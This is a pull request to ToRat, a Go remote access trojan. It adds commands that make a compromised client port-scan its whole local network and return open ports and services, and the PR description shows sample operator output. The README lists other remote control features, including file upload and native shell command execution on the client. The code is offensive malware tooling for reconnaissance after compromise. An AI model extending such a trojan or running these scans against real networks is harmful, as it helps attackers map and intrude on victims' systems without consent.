### PR TITLE
Adds network scanning as feature

### DIFF
--- a/README.md
+++ b/README.md
@@ -32,6 +32,8 @@ USE FOR EDUCATIONAL PURPOSES ONLY
   **up**          | Working     |   upload a file to the client
   **speedtest**   | Working     |   speedtest a client's internet connection
   **hardware**    | Working     |   collects a variety of hardware specs from the client
+  **netscan**     | Working     |   scans a clients entire network for online devices and open ports
+  **gomap**       | Working     |   scan a local ip on a clients network for open ports and services
   **escape**      | Working     |   escape a command and run it in a native shell on the client
   **reconnect**   | Not Working |   tell the client to reconnect
   **help**        | Working     |   lists possible commands with usage info
@@ -109,7 +111,7 @@ All contributions are welcome you don't need to be an expert in Go to contribute
 - [Colored Prints](https://github.com/fatih/color)
 - [Screenshot library](https://github.com/vova616/screenshot)
 - [TLS Certificate generator](https://github.com/lu4p/genCert)
-- [Shred library](https://github.com/lu4p/genCert)
+- [Shred library](https://github.com/lu4p/shred)
 - [Extract Text from Documents](https://github.com/lu4p/cat)
 - [RPC](https://golang.org/pkg/net/rpc/)
 - [UPX](https://upx.github.io/)

--- a/go.mod
+++ b/go.mod
@@ -4,6 +4,7 @@ go 1.16
 
 require (
 	github.com/BurntSushi/xgb v0.0.0-20210121224620-deaf085860bc // indirect
+	github.com/JustinTimperio/gomap v0.0.0-20210311183127-b4beba1c5710
 	github.com/JustinTimperio/osinfo v0.0.0-20210307040040-1316be5f0aa1
 	github.com/abiosoft/ishell v2.0.0+incompatible
 	github.com/abiosoft/readline v0.0.0-20180607040430-155bce2042db // indirect

--- a/go.sum
+++ b/go.sum
@@ -2,6 +2,8 @@ github.com/BurntSushi/xgb v0.0.0-20210121224620-deaf085860bc h1:7D+Bh06CRPCJO3gr
 github.com/BurntSushi/xgb v0.0.0-20210121224620-deaf085860bc/go.mod h1:IVnqGOEym/WlBOVXweHU+Q+/VP0lqqI8lqeDx9IjBqo=
 github.com/EndFirstCorp/peekingReader v0.0.0-20171012052444-257fb6f1a1a6 h1:t27CGFMv8DwGwqRPEa2VNof5I/aZwO6q2gfJhN8q0U4=
 github.com/EndFirstCorp/peekingReader v0.0.0-20171012052444-257fb6f1a1a6/go.mod h1:zpqkXxDsVfEIUZEWvT9yAo8OmRvSlRrcYQ3Zs8sSubA=
+github.com/JustinTimperio/gomap v0.0.0-20210311183127-b4beba1c5710 h1:GJDowopnOgl/I3xfZJudrKCmLyujK0pOadWH6C9sB3I=
+github.com/JustinTimperio/gomap v0.0.0-20210311183127-b4beba1c5710/go.mod h1:VBqui7Nb9LVK7v2aBtl8JjhNbc+67NnUjpvTqdgfAUw=
 github.com/JustinTimperio/osinfo v0.0.0-20210307040040-1316be5f0aa1 h1:NY2G+SGSJfbm82IuG6zFU1rU5Duo+CM7PLAxsViIUig=
 github.com/JustinTimperio/osinfo v0.0.0-20210307040040-1316be5f0aa1/go.mod h1:XzwetahnRWkdgdIQgXyahEaEvLDncafoTQE+2DeL9H0=
 github.com/StackExchange/wmi v0.0.0-20190523213315-cbe66965904d h1:G0m3OIz70MZUWq3EgK3CesDbo8upS2Vm9/P3FtgI+Jk=

--- a/shared/models.go
+++ b/shared/models.go
@@ -15,6 +15,7 @@ var (
 	_ = reflect.TypeOf(EncAsym{})
 	_ = reflect.TypeOf(Hardware{})
 	_ = reflect.TypeOf(Speedtest{})
+	_ = reflect.TypeOf(Gomap{})
 )
 
 type Void int
@@ -66,4 +67,8 @@ type Speedtest struct {
 	Download float64
 	Upload   float64
 	Country  string
+}
+
+type Gomap struct {
+	Scan string
 }

--- a/torat_client/rpcapi.go
+++ b/torat_client/rpcapi.go
@@ -10,6 +10,7 @@ import (
 	"path/filepath"
 	"reflect"
 
+	"github.com/JustinTimperio/gomap"
 	"github.com/JustinTimperio/osinfo"
 	"github.com/jaypipes/ghw"
 	"github.com/lu4p/ToRat/shared"
@@ -208,5 +209,18 @@ func (a *API) GetHardware(v shared.Void, r *shared.Hardware) error {
 		r.GPU = vc.DeviceInfo.Product.Name
 	}
 
+	return nil
+}
+func (a *API) Gomap(ip string, r *shared.Gomap) (err error) {
+	fastscan := true
+	scan := gomap.ScanIP(ip, fastscan)
+	r.Scan = scan.String()
+	return nil
+}
+
+func (a *API) GomapLocal(v shared.Void, r *shared.Gomap) (err error) {
+	fastscan := true
+	scan := gomap.ScanRange(fastscan)
+	r.Scan = scan.String()
 	return nil
 }


### PR DESCRIPTION
@lu4p This was fairly difficult to implement since there are basically zero existing libraries portscanning libraries that don't require external dependencies of some kind. I wrote a module that implements a basic port scanning feature which works reasonably well. Sadly because of limits on my time and skill the module often shows false negatives when scanning a large number of ports at once. For this reason, `netscan` and `gomap` always use the 'fastscan' mode which scans a limited number of ports and is much more accurate because of it.

Here is a sample out:
```
[0hRyUf43QD1shncjv_1hFA] /home/justin/Repos/GoLang/ToRat$ gomap 192.168.1.120
[0hRyUf43QD1shncjv_1hFA] This will take up to 1 minute!
[0hRyUf43QD1shncjv_1hFA] [+] Gomap finished

Host: Voyager. (192.168.1.120)
        |     Port      Service
        |     ----      -------
        |---- 443       https
        |---- 80        http
        |---- 22        ssh
[0hRyUf43QD1shncjv_1hFA] /home/justin/Repos/GoLang/ToRat$
```